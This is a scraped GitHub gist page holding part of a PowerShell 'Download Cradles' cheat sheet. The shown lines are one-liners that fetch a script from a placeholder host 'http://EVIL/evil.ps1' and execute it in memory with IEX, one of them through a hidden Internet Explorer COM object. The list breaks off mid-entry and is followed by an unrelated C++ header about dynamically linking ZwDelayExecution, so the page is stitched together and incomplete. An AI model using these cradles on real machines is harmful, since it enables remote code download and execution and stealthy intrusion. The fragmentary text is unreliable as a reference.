Skip to content

Instantly share code, notes, and snippets.

View stormfleet's full-sized avatar

stormfleet stormfleet

View GitHub Profile
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 3, 2026 23:46
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
/*
http://moustafasaleh.blogspot.com/ (@msaleh83)
Example of dynamically linking ZwDelayExecution Windows internal API
compile:
cl ZwDelayExecution1.cpp kernel32.lib user32.lib
gcc ZwDelayExecution1.cpp -o ZwDelayExecution1.exe
*/
#define UNICODE